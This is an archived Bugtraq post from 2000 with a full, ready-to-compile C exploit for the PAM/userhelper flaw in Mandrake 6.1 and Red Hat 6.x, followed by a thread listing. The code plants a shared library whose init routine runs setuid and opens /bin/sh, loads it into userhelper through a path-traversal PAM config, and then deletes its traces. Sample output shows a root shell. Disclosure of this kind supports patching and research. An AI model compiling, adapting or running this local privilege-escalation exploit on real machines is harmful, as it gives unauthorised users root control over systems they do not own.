Bugtraq mailing list archives
Exploit for Mandrake 6.1 (PAM/userhelper bug)
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 15 Mar 2000 00:14:05 +0000
/*
* pam-mdk.c (C) 2000 Paulo Ribeiro
*
* DESCRIPTION:
* -----------
* Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
* exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
* I created this C program based on it which exploits PAM/userhelper
* and gives you UID 0.
*
* SYSTEMS TESTED:
* --------------
* Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
*
* RESULTS:
* -------
* [prrar@linux prrar]$ id
* uid=501(prrar) gid=501(prrar) groups=501(prrar)
* [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
* [prrar@linux prrar]$ ./pam-mdk
* sh-2.03# id
* uid=0(root) gid=501(prrar) groups=501(prrar)
* sh-2.03#
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
FILE *fp;
strcpy(argv[0], "vi test.txt");
fp = fopen("abc.c", "a");
fprintf(fp, "#include<stdlib.h>\n");
fprintf(fp, "#include<unistd.h>\n");
fprintf(fp, "#include<sys/types.h>\n");
fprintf(fp, "void _init(void) {\n");
fprintf(fp, "\tsetuid(geteuid());\n");
fprintf(fp, "\tsystem(\"/bin/sh\");\n");
fprintf(fp, "}");
fclose(fp);
system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
system("chmod 755 abc.conf");
system("gcc -fPIC -o abc.o -c abc.c");
system("ld -shared -o abc.so abc.o");
system("chmod 755 abc.so");
system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
system("rm -rf abc.*");
}
/* pam-mdk.c: EOF */
___________________________________
Paulo Ribeiro prrar () nitnet com br
Current thread:
- TESO advisory -- wmcdplay krahmer () CS UNI-POTSDAM DE (Mar 11)
- Our old friend Firewall-1 Chris Brenton (Mar 11)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: Our old friend Firewall-1 Chris Brenton (Mar 15)
- TESO & C-Skills development advisory -- imwheel Sebastian (Mar 16)
- Re: TESO & C-Skills development advisory -- imwheel WHiTe VaMPiRe (Mar 19)
- Re: Our old friend Firewall-1 Hugo.van.der.Kooij () CAIW NL (Mar 14)
- Re: TESO advisory -- wmcdplay Kris Kennaway (Mar 11)
- CSS Exploits + RDS (IE5) Shane Hird (Mar 12)
- Advisory Update: ServerIron TCP/IP predictability fixed Andrew van der Stock (Mar 12)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Darron Froese (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Matt Davis (Mar 17)
- Re: Exploit for Mandrake 6.1 (PAM/userhelper bug) Jeremy Gault (Mar 21)
- Oracle Web Listener 4.0.x Cerberus Security Team (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed H D Moore (Mar 14)
- Re: Advisory Update: ServerIron TCP/IP predictability fixed Max Vision (Mar 16)
- FreeBSD Security Advisory: FreeBSD-SA-00:07.mh [REVISED] FreeBSD Security Officer (Mar 19)
- Bypassing IP filters in Bordermanager 3.5 Roy Sigurd Karlsbakk (Mar 15)
- Local / Remote DoS Attack in MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability Ussr Labs (Mar 15)
- Certificate Validation Error in Netscape Browsers... Dennis W. Mattison (Little Wolf) (Mar 15)
- Exploit for Mandrake 6.1 (PAM/userhelper bug) Paulo Ribeiro (Mar 14)
(Thread continues...)
- Our old friend Firewall-1 Chris Brenton (Mar 11)